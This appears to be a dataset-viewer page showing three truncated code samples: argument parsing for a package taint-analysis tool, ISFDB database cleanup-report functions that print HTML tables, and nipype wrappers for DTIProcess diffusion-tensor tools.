parser_astgen.add_argument("inpath", help="Path to the input directory or file")
parser_astgen.add_argument("outfile", help="Path to the output file.")
parser_astgen.add_argument("-b", "--root", dest="root", help="Path to the root of the source.")
parser_astgen.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
parser_astgen.add_argument("-n", "--package_name", dest="package_name",
help="Package name of the specified input.")
parser_astgen.add_argument("-v", "--package_version", dest="package_version",
help="Package version of the specified input.")
parser_astgen.add_argument("-e", "--evaluate_smt", dest="evaluate_smt", action="store_true",
help="Evaluate the smt formula in the astgen output.")
parser_astgen.add_argument("-c", "--configpath", dest="configpath",
help="Optional path to the filter of nodes, stored in proto buffer format (AstLookupConfig in ast.proto).")
# filter the packages based on specified SMT formula
parser_astfilter = subparsers.add_parser("astfilter", help="Filter the packages based on specified SMT formula")
parser_astfilter.add_argument("-n", "--package_name", required=True, dest="package_name",
help="Package name of the specified input.")
parser_astfilter.add_argument("-v", "--package_version", dest="package_version",
help="Package version of the specified input.")
parser_astfilter.add_argument("--ignore_dep_version", dest="ignore_dep_version", action="store_true",
help="Ignore the version for dependencies and use their latest versions.")
parser_astfilter.add_argument("--ignore_dep", dest="ignore_dep", action="store_true",
help="Ignore the dependencies and analyze only the specified package.")
parser_astfilter.add_argument("-d", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_astfilter.add_argument("-o", "--out_dir", required=True, dest="out_dir", help="Path to analysis output dir.")
parser_astfilter.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
parser_astfilter.add_argument("-m", "--package_manager", type=PackageManagerEnum, choices=list(PackageManagerEnum),
help="Package manager of the specified input.")
parser_astfilter.add_argument("-c", "--configpath", dest="configpath",
help="Optional path to the filter of nodes, stored in proto buffer format (AstLookupConfig in ast.proto).")
# run taint analysis on the specified package
parser_taint = subparsers.add_parser("taint", help="Run taint analysis on the specified package")
parser_taint.add_argument("-n", "--package_name", required=True, dest="package_name",
help="Package name of the specified input.")
parser_taint.add_argument("-v", "--package_version", dest="package_version",
help="Package version of the specified input.")
parser_taint.add_argument("-i", "--inpath", dest="inpath",
help="Path to the input directory or file. If specified, don't check dependencies.")
parser_taint.add_argument("--ignore_dep_version", dest="ignore_dep_version", action="store_true",
help="Ignore the version for dependencies and use their latest versions.")
parser_taint.add_argument("--ignore_dep", dest="ignore_dep", action="store_true",
help="Ignore the dependencies and analyze only the specified package.")
parser_taint.add_argument("-d", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_taint.add_argument("-o", "--out_dir", required=True, dest="out_dir", help="Path to analysis output dir.")
parser_taint.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
parser_taint.add_argument("-c", "--configpath", dest="configpath",
help="Optional path to the filter of nodes, stored in proto buffer format (AstLookupConfig in ast.proto).")
# run filter_pkg analysis on list of packages
parser_filter_pkg = subparsers.add_parser("filter_pkg", help="Filter package based on selected criteria, e.g. api, flow")
parser_filter_pkg.add_argument("infile", help="Path to the input file of packages.")
parser_filter_pkg.add_argument("outfile", help="Path to the output file.")
parser_filter_pkg.add_argument("-d", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_filter_pkg.add_argument("-o", "--out_dir", required=True, dest="out_dir", help="Path to analysis output dir.")
parser_filter_pkg.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
parser_filter_pkg.add_argument("-c", "--configpath", dest="configpath",
help="Reduced filter of nodes, stored in proto buffer format (AstLookupConfig in ast.proto).")
# run danger api analysis on the specified package
parser_danger = | |
class="table2">'
award_cat_id = record[0][AWARD_CAT_ID]
award_cat_name = record[0][AWARD_CAT_NAME]
print '<td>%s</td>' % ISFDBLink('award_category.cgi', award_cat_id, award_cat_name)
print '</tr>'
record = result.fetch_row()
bgcolor ^= 1
print '</table>'
else:
print '<h3>No empty Award Categories found</h3>'
def function27():
query = """select s.series_id, s.series_title from series s, cleanup c where
c.record_id=s.series_id and c.report_type=27 and exists
(select 1 from titles t where t.title_ttype='CHAPBOOK'
and t.series_id = s.series_id)
order by s.series_title"""
db.query(query)
result = db.store_result()
if not result.num_rows():
print "<h2>No records found</h2>"
return
record = result.fetch_row()
bgcolor = 1
count = 1
PrintTableColumns(('', 'Series',))
while record:
series_id = record[0][0]
series_name = record[0][1]
PrintSeriesRecord(series_id, series_name, bgcolor, count)
bgcolor ^= 1
count += 1
record = result.fetch_row()
print "</table>"
def function28():
query = """select t.title_id, t.title_title from titles t, cleanup c
where t.title_ttype='CHAPBOOK' and t.title_synopsis !=0
and c.record_id=t.title_id and c.report_type=28 order by t.title_title"""
db.query(query)
result = db.store_result()
num = result.num_rows()
if num > 0:
record = result.fetch_row()
bgcolor = 1
count = 1
PrintTableColumns(('', 'Title',))
while record:
title_id = record[0][0]
title_title = record[0][1]
PrintTitleRecord(title_id, title_title, bgcolor, count)
bgcolor ^= 1
count += 1
record = result.fetch_row()
print "</table>"
else:
print "<h2>No records found</h2>"
def function29():
query = """select pub_id, pub_title from pubs, cleanup
where pub_ctype='CHAPBOOK' and NOT EXISTS
(select 1 from pub_content,titles where pubs.pub_id=pub_content.pub_id
and pub_content.title_id=titles.title_id and (titles.title_ttype='SHORTFICTION'
or titles.title_ttype='POEM' or titles.title_ttype='SERIAL'))
and pubs.pub_id=cleanup.record_id and cleanup.report_type=29
order by pub_title"""
db.query(query)
result = db.store_result()
num = result.num_rows()
if num > 0:
record = result.fetch_row()
PrintTableColumns(('', 'Publication Title'))
bgcolor = 1
count = 1
while record:
pub_id = record[0][0]
pub_title = record[0][1]
PrintPublicationRecord(pub_id, pub_title, bgcolor, count)
bgcolor ^= 1
count += 1
record = result.fetch_row()
print "</table>"
else:
print "<h2>No records found</h2>"
def function30():
query = """select t1.title_id, t1.title_title from titles t1, titles t2, cleanup c where
t1.title_ttype='CHAPBOOK' and t2.title_parent=t1.title_id and t2.title_ttype!='CHAPBOOK'
and (t1.title_id=c.record_id or t2.title_id=c.record_id) and c.report_type=30
UNION select t1.title_id,t1.title_title from titles t1, titles t2, cleanup c where
t1.title_ttype!='CHAPBOOK' and t2.title_parent=t1.title_id and t2.title_ttype='CHAPBOOK'
and (t1.title_id=c.record_id or t2.title_id=c.record_id) and c.report_type=30"""
db.query(query)
result = db.store_result()
if not result.num_rows():
print "<h2>No records found</h2>"
return
record = result.fetch_row()
bgcolor = 1
count = 1
PrintTableColumns(('', 'Title',))
while record:
title_id = record[0][0]
title_title = record[0][1]
PrintTitleRecord(title_id, title_title, bgcolor, count)
bgcolor ^= 1
count += 1
record = result.fetch_row()
print "</table>"
def function31():
query = """select c.cleanup_id, p.pub_id, p.pub_isbn, p.pub_year from pubs p, cleanup c
where ((p.pub_isbn like '97%' and length(replace(p.pub_isbn,'-',''))=13
and p.pub_year <'2005-00-00' and p.pub_year !='0000-00-00') or
(p.pub_isbn not like '#%' and length(replace(p.pub_isbn,'-',''))=10
and p.pub_year>'2008-00-00' and p.pub_year !='8888-00-00' and
p.pub_year !='9999-00-00')) and p.pub_id=c.record_id and
c.report_type=31 and c.resolved IS NULL order by pub_year, pub_isbn"""
db.query(query)
result = db.store_result()
num = result.num_rows()
if num > 0:
record = result.fetch_row()
bgcolor = 1
count = 1
PrintTableColumns(('Count', 'Date', 'ISBN', ''))
while record:
if bgcolor:
print '<tr align=left class="table1">'
else:
print '<tr align=left class="table2">'
print '<td>%d</td>' % count
print '<td>%s</td>' % record[0][3]
print '<td>%s</td>' % ISFDBLink('pl.cgi', record[0][1], record[0][2])
print '<td>%s</td>' % ISFDBLink('mod/resolve_cleanup.cgi',
'%s+1+31' % record[0][0],
'Ignore this ISBN')
print '</tr>'
bgcolor ^= 1
count += 1
record = result.fetch_row()
print '</table>'
else:
print '<h2>No records found</h2>'
def function32():
query = """select p1.pub_id, p1.pub_tag, p1.pub_title from pubs p1,
(select pub_tag, count(*) from pubs, cleanup c where pubs.pub_id=c.record_id
and c.report_type=32 group by pub_tag having count(*) > 1) p2
where p1.pub_tag = p2.pub_tag order BY 2,1,3"""
db.query(query)
result = db.store_result()
num = result.num_rows()
if num > 0:
record = result.fetch_row()
bgcolor = 1
PrintTableColumns(('Publication Title', 'Publication Tag'))
while record:
if bgcolor:
print '<tr align=left class="table1">'
else:
print '<tr align=left class="table2">'
print '<td>%s</td>' % ISFDBLink('pl.cgi', record[0][0], record[0][2])
print '<td>%s</td>' % record[0][1]
print '</tr>'
bgcolor ^= 1
record = result.fetch_row()
print "</table>"
else:
print "<h2>No records found</h2>"
def function33():
query = """select p.pub_id, p.pub_title as order_title, pa.author_id, a.author_canonical
from pub_authors pa, pubs p, pub_content pc, titles t, authors a, cleanup
where pa.pub_id = p.pub_id
and pc.title_id = t.title_id
and pc.pub_id = p.pub_id
and pa.author_id = a.author_id
and p.pub_ctype in ('ANTHOLOGY','NOVEL','COLLECTION','NONFICTION','OMNIBUS','CHAPBOOK')
and t.title_ttype in ('ANTHOLOGY','NOVEL','COLLECTION','OMNIBUS','NONFICTION','CHAPBOOK')
and t.title_ttype = p.pub_ctype
and not exists
(select 1 from canonical_author ca
where ca.title_id = t.title_id and pa.author_id = ca.author_id)
and p.pub_id=cleanup.record_id and cleanup.report_type=33
UNION
select p.pub_id, p.pub_title as order_title, pa.author_id, a.author_canonical
from pub_authors pa, pubs p, pub_content pc, titles t, authors a, cleanup
where pa.pub_id = p.pub_id
and pc.title_id = t.title_id
and pc.pub_id = p.pub_id
and pa.author_id = a.author_id
and p.pub_ctype in ('FANZINE','MAGAZINE')
and t.title_ttype = 'EDITOR'
and t.title_language != 26
and not exists
(select 1 from canonical_author ca
where ca.title_id = t.title_id and pa.author_id = ca.author_id)
and p.pub_id=cleanup.record_id and cleanup.report_type=33
order by order_title"""
db.query(query)
result = db.store_result()
num = result.num_rows()
if num > 0:
record = result.fetch_row()
bgcolor = 1
count = 1
PrintTableColumns(('', 'Title', 'Author'))
while record:
if bgcolor:
print '<tr align=left class="table1">'
else:
print '<tr align=left class="table2">'
print '<td>%d</td>' % count
print '<td>%s</td>' % ISFDBLink('pl.cgi', record[0][0], record[0][1])
print '<td>%s</td>' % ISFDBLink('ea.cgi', record[0][2], record[0][3])
print '</tr>'
bgcolor ^= 1
count += 1
record = result.fetch_row()
print '</table>'
else:
print '<h2>No records found</h2>'
def function34():
query = """select pub_id, pub_title from pubs, cleanup
where not exists
(select 1 from pub_content pc, titles t
where pubs.pub_id = pc.pub_id
and pc.title_id = t.title_id
and t.title_ttype != 'COVERART')
and pubs.pub_id=cleanup.record_id
and cleanup.report_type=34
order by pubs.pub_title"""
db.query(query)
result = db.store_result()
num = result.num_rows()
if num > 0:
record = result.fetch_row()
bgcolor = 1
count = 1
PrintTableColumns(('', 'Publication Title',))
while record:
pub_id = record[0][0]
pub_title = record[0][1]
PrintPublicationRecord(pub_id, pub_title, bgcolor, count)
bgcolor ^= 1
count += 1
record = result.fetch_row()
print "</table>"
else:
print "<h2>No records found</h2>"
def function35():
formats = "'" + "','".join(FORMATS) + "'"
query = """select pubs.pub_ptype, pubs.pub_id, pubs.pub_title from pubs, cleanup where
pubs.pub_ptype not in (%s) and pubs.pub_ptype IS NOT NULL and pubs.pub_ptype !=''
and pubs.pub_id=cleanup.record_id and cleanup.report_type=35
order by pubs.pub_ptype, pubs.pub_title""" % (formats)
db.query(query)
result = db.store_result()
if not result.num_rows():
print '<h2>No matching records</h2>'
return
PrintTableColumns(('Format', 'Publication'))
bgcolor = 1
record = result.fetch_row()
while record:
format = record[0][0]
pub_id = record[0][1]
pub_title = record[0][2]
if bgcolor:
print '<tr align=left class="table1">'
else:
print '<tr align=left class="table2">'
print '<td>%s</td>' % format
print '<td>'
print ISFDBLink('pl.cgi', pub_id, pub_title)
print '</td>'
print '</tr>'
bgcolor ^= 1
record = result.fetch_row()
print '</table>'
def function36():
query = """select pub_id, pub_title, pub_frontimage from pubs, cleanup
where pubs.pub_frontimage!='' and pubs.pub_frontimage is not null
and pubs.pub_id=cleanup.record_id and cleanup.report_type=36"""
domains = RecognizedDomains()
for domain in domains:
# Skip domains that are "recognized", but we don't have permission to link to
if domain[3] == 0:
continue
query += " and pubs.pub_frontimage not like '%"
query += "%s" % domain[0]
query += "%'"
query += " order by pubs.pub_frontimage"
db.query(query)
result = db.store_result()
record = result.fetch_row()
if not record:
print "<h2>No records found</h2>"
return
bgcolor = 1
PrintTableColumns(('Publication', 'URL'))
while record:
if bgcolor:
print '<tr align=left class="table1">'
else:
print '<tr align=left class="table2">'
print '<td>%s</td>' % ISFDBLink('pl.cgi', record[0][0], record[0][1])
print '<td><a href="%s">%s</a></td>' % (record[0][2], record[0][2])
print '</tr>'
bgcolor ^= 1
record = result.fetch_row()
print "</table>"
def function37():
nonModeratorMessage()
query = """select p.pub_id, p.pub_title, c.cleanup_id
from pubs p, cleanup c
where p.pub_ctype='OMNIBUS'
and p.pub_id=c.record_id
and c.report_type=37
and c.resolved is NULL
and NOT EXISTS
(select 1 from pub_content pc, titles t
where p.pub_id=pc.pub_id
and pc.title_id=t.title_id
and t.title_ttype in ('NOVEL', 'COLLECTION', 'ANTHOLOGY', 'NONFICTION')
)
order by p.pub_title"""
db.query(query)
result = db.store_result()
num = result.num_rows()
if num > 0:
record = result.fetch_row()
PrintTableColumns(('', 'Publication Title', 'Ignore'))
bgcolor = 1
count = 1
while record:
pub_id = record[0][0]
pub_title = record[0][1]
cleanup_id = record[0][2]
PrintPublicationRecord(pub_id, pub_title, bgcolor, count, cleanup_id, 37)
bgcolor ^= 1
count += 1
record = result.fetch_row()
print '</table>'
else:
print '<h2>No records found</h2>'
def function38():
query = 'select pc.pub_id, pc.title_id, count(*) as cnt \
from pub_content pc, cleanup c \
where pc.pub_id=c.record_id and c.report_type=38 \
group by pc.pub_id, pc.title_id having cnt>1'
db.query(query)
result = db.store_result()
num = result.num_rows()
pubs = {}
titles = {}
pub_data = {}
title_data = {}
record = result.fetch_row()
while record:
pub_id = record[0][0]
# Skip records where pub_id is NULL -- they will have to be cleaned up manually
if not pub_id:
record = result.fetch_row()
continue
title_id = record[0][1]
count = record[0][2]
pub_data[pub_id] = SQLGetPubById(pub_id)
title_data[title_id] = SQLloadTitle(title_id)
if pub_id not in pubs:
pubs[pub_id] = [(title_id, count), ]
else:
pubs[pub_id].append((title_id, count), )
record = result.fetch_row()
if not pubs:
print "<h2>No publications with duplicate titles found</h2>"
return
bgcolor = 1
PrintTableColumns(('Publication', 'Duplicate Titles (count)'))
for pub_id in pubs:
titles = pubs[pub_id]
pub_title = pub_data[pub_id][PUB_TITLE]
if bgcolor:
print '<tr align=left class="table1">'
else:
print '<tr align=left class="table2">'
print '<td>%s</td>' % ISFDBLink('pl.cgi', pub_id, pub_title)
print '<td>'
first = 1
| |
# -*- coding: utf-8 -*-
# -*- coding: utf8 -*-
"""Autogenerated file - DO NOT EDIT
If you spot a bug, please report it on the mailing list and/or change the generator."""
import os
from ...base import (CommandLine, CommandLineInputSpec, SEMLikeCommandLine,
TraitedSpec, File, Directory, traits, isdefined,
InputMultiPath, OutputMultiPath)
class dtiaverageInputSpec(CommandLineInputSpec):
inputs = InputMultiPath(File(exists=True), desc="List of all the tensor fields to be averaged", argstr="--inputs %s...")
tensor_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Averaged tensor volume", argstr="--tensor_output %s")
DTI_double = traits.Bool(desc="Tensor components are saved as doubles (cannot be visualized in Slicer)", argstr="--DTI_double ")
verbose = traits.Bool(desc="produce verbose output", argstr="--verbose ")
class dtiaverageOutputSpec(TraitedSpec):
tensor_output = File(desc="Averaged tensor volume", exists=True)
class dtiaverage(SEMLikeCommandLine):
"""title: DTIAverage (DTIProcess)
category: Diffusion.Diffusion Tensor Images.CommandLineOnly
description: dtiaverage is a program that allows to compute the average of an arbitrary number of tensor fields (listed after the --inputs option) This program is used in our pipeline as the last step of the atlas building processing. When all the tensor fields have been deformed in the same space, to create the average tensor field (--tensor_output) we use dtiaverage.
Several average method can be used (specified by the --method option): euclidian, log-euclidian and pga. The default being euclidian.
version: 1.0.0
documentation-url: http://www.slicer.org/slicerWiki/index.php/Documentation/Nightly/Extensions/DTIProcess
license: Copyright (c) <NAME>. All rights reserved.
See http://www.ia.unc.edu/dev/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notices for more information.
contributor: <NAME>
"""
input_spec = dtiaverageInputSpec
output_spec = dtiaverageOutputSpec
_cmd = " dtiaverage "
_outputs_filenames = {'tensor_output': 'tensor_output.nii'}
_redirect_x = False
class dtiestimInputSpec(CommandLineInputSpec):
dwi_image = File(desc="DWI image volume (required)", exists=True, argstr="--dwi_image %s")
tensor_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Tensor OutputImage", argstr="--tensor_output %s")
B0 = traits.Either(traits.Bool, File(), hash_files=False, desc="Baseline image, average of all baseline images", argstr="--B0 %s")
idwi = traits.Either(traits.Bool, File(), hash_files=False, desc="idwi output image. Image with isotropic diffusion-weighted information = geometric mean of diffusion images", argstr="--idwi %s")
B0_mask_output = traits.Either(traits.Bool, File(), hash_files=False, desc="B0 mask used for the estimation. B0 thresholded either with the -t option value or the automatic OTSU value", argstr="--B0_mask_output %s")
brain_mask = File(desc="Brain mask. Image where for every voxel == 0 the tensors are not estimated. Be aware that in addition a threshold based masking will be performed by default. If such an additional threshold masking is NOT desired, then use option -t 0.",
exists=True, argstr="--brain_mask %s")
bad_region_mask = File(desc="Bad region mask. Image where for every voxel > 0 the tensors are not estimated", exists=True, argstr="--bad_region_mask %s")
method = traits.Enum("lls", "wls", "nls", "ml", desc="Esitmation method (lls:linear least squares, wls:weighted least squares, nls:non-linear least squares, ml:maximum likelihood)", argstr="--method %s")
correction = traits.Enum("none", "zero", "abs", "nearest", desc="Correct the tensors if computed tensor is not semi-definite positive", argstr="--correction %s")
threshold = traits.Int(desc="Baseline threshold for estimation. If not specified calculated using an OTSU threshold on the baseline image.", argstr="--threshold %d")
weight_iterations = traits.Int(desc="Number of iterations to recaluate weightings from tensor estimate", argstr="--weight_iterations %d")
step = traits.Float(desc="Gradient descent step size (for nls and ml methods)", argstr="--step %f")
sigma = traits.Float(argstr="--sigma %f")
DTI_double = traits.Bool(desc="Tensor components are saved as doubles (cannot be visualized in Slicer)", argstr="--DTI_double ")
verbose = traits.Bool(desc="produce verbose output", argstr="--verbose ")
defaultTensor = InputMultiPath(traits.Float, desc="Default tensor used if estimated tensor is below a given threshold", sep=",", argstr="--defaultTensor %s")
shiftNeg = traits.Bool(
desc="Shift eigenvalues so all are positive (accounts for bad tensors related to noise or acquisition error). This is the same option as the one available in DWIToDTIEstimation in Slicer (but instead of just adding the minimum eigenvalue to all the eigenvalues if it is smaller than 0, we use a coefficient to have stictly positive eigenvalues", argstr="--shiftNeg ")
shiftNegCoeff = traits.Float(
desc="Shift eigenvalues so all are positive (accounts for bad tensors related to noise or acquisition error). Instead of just adding the minimum eigenvalue to all the eigenvalues if it is smaller than 0, we use a coefficient to have stictly positive eigenvalues. Coefficient must be between 1.0 and 1.001 (included).", argstr="--shiftNegCoeff %f")
class dtiestimOutputSpec(TraitedSpec):
tensor_output = File(desc="Tensor OutputImage", exists=True)
B0 = File(desc="Baseline image, average of all baseline images", exists=True)
idwi = File(desc="idwi output image. Image with isotropic diffusion-weighted information = geometric mean of diffusion images", exists=True)
B0_mask_output = File(desc="B0 mask used for the estimation. B0 thresholded either with the -t option value or the automatic OTSU value", exists=True)
class dtiestim(SEMLikeCommandLine):
"""title: DTIEstim (DTIProcess)
category: Diffusion.Diffusion Weighted Images
description: dtiestim is a tool that takes in a set of DWIs (with --dwi_image option) in nrrd format and estimates a tensor field out of it. The output tensor file name is specified with the --tensor_output option
There are several methods to estimate the tensors which you can specify with the option --method lls|wls|nls|ml . Here is a short description of the different methods:
lls
Linear least squares. Standard estimation technique that recovers the tensor parameters by multiplying the log of the normalized signal intensities by the pseudo-inverse of the gradient matrix. Default option.
wls
Weighted least squares. This method is similar to the linear least squares method except that the gradient matrix is weighted by the original lls estimate. (See <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., and <NAME>. Formal characterization and extension of the linearized diffusion tensor model. Human Brain Mapping 24, 2 (Feb. 2005), 144-155. for more information on this method). This method is recommended for most applications. The weight for each iteration can be specified with the --weight_iterations. It is not currently the default due to occasional matrix singularities.
nls
Non-linear least squares. This method does not take the log of the signal and requires an optimization based on levenberg-marquadt to optimize the parameters of the signal. The lls estimate is used as an initialization. For this method the step size can be specified with the --step option.
ml
Maximum likelihood estimation. This method is experimental and is not currently recommended. For this ml method the sigma can be specified with the option --sigma and the step size can be specified with the --step option.
You can set a threshold (--threshold) to have the tensor estimated to only a subset of voxels. All the baseline voxel value higher than the threshold define the voxels where the tensors are computed. If not specified the threshold is calculated using an OTSU threshold on the baseline image.The masked generated by the -t option or by the otsu value can be saved with the --B0_mask_output option.
dtiestim also can extract a few scalar images out of the DWI set of images:
- the average baseline image (--B0) which is the average of all the B0s.
- the IDWI (--idwi)which is the geometric mean of the diffusion images.
You can also load a mask if you want to compute the tensors only where the voxels are non-zero (--brain_mask) or a negative mask and the tensors will be estimated where the negative mask has zero values (--bad_region_mask)
version: 1.2.0
documentation-url: http://www.slicer.org/slicerWiki/index.php/Documentation/Nightly/Extensions/DTIProcess
license: Copyright (c) <NAME>. All rights reserved.
See http://www.ia.unc.edu/dev/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notices for more information.
contributor: <NAME>, <NAME>
acknowledgements: <NAME>(1,3,4); <NAME>(1); (1=University of Iowa Department of Psychiatry, 3=University of Iowa Department of Biomedical Engineering, 4=University of Iowa Department of Electrical and Computer Engineering) provided conversions to make DTIProcess compatible with Slicer execution, and simplified the stand-alone build requirements by removing the dependancies on boost and a fortran compiler.
"""
input_spec = dtiestimInputSpec
output_spec = dtiestimOutputSpec
_cmd = " dtiestim "
_outputs_filenames = {'B0': 'B0.nii', 'idwi': 'idwi.nii', 'tensor_output': 'tensor_output.nii', 'B0_mask_output': 'B0_mask_output.nii'}
_redirect_x = False
class dtiprocessInputSpec(CommandLineInputSpec):
dti_image = File(desc="DTI tensor volume", exists=True, argstr="--dti_image %s")
fa_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Fractional Anisotropy output file", argstr="--fa_output %s")
md_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Mean Diffusivity output file", argstr="--md_output %s")
sigma = traits.Float(desc="Scale of gradients", argstr="--sigma %f")
fa_gradient_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Fractional Anisotropy Gradient output file", argstr="--fa_gradient_output %s")
fa_gradmag_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Fractional Anisotropy Gradient Magnitude output file", argstr="--fa_gradmag_output %s")
color_fa_output = traits.Either(traits.Bool, File(), |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.